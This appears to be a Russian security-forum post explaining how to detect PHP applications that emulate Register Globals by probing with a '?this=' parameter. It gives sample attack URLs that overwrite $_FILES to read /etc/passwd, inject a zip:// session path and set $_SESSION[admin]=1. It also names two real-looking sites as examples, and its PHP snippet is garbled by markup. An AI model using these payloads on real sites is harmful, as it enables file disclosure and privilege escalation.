$this - это специальная переменная

18.12.2019, 01:05

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

По мотивам https://krober.biz/?p=3306 (веб-архив), с печальным выводом:

Цитата:

Сообщение от КРОБА

КРОБА said:
Интересно, но бесполезно.

До этого момента, с таким контекстом не встречался и в голову так же не приходило. Поэтому, после прочтения заметки, один юз кейс сразу нарисовался и спешу поделиться с вами

Некоторые PHP разработчики, за каким-то хреном, используют эмуляцию почившего режима Register Globals (RG). Выглядеть это может по разному:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]) $[/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"];
unset([/COLOR][COLOR="#0000BB"]$GET[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]

и пр.

Понятное дело, что при вайтбоксе оно нам и даром не нужно, у нас же всё как на ладони. Но вот при блекбоксе пых приложух, фишечка может очень сильно помочь задетектить такой вот своеобразный RG. Соответственно, тут всплывают все прелести атак типа:

Код:

Code:
http://site.com/upload.php?_FILES[file][name]=image.jpg&_FILES[file][type]=image/jpeg&_FILES[file][tmp_name]=/etc/passwd&_FILES[file][error]=0&_FILES[file][size]=1000

или

Код:

Code:
httр://site.com/upload.php?_SERVER[DOCUMENT_ROOT]=zip:///var/lib/php/sessions/sess_test%23

или

Код:

Code:
httр://site.com/upload.php?_SESSION[admin]=1

и другие варианты, в зависимости от предполагаемой логики работы чёрного ящика

Парочка примеров:

Цитата:

Сообщение от None

https://www.novikovgroup.ru/?this=works
https://www.novikovgroup.ru/?thiss=works

Цитата:

Сообщение от None

https://demo.whmcsadmintheme.com/?this=works
https://demo.whmcsadmintheme.com/?thiss=works

ANTICHAT — форум по информационной безопасности, OSINT и технологиям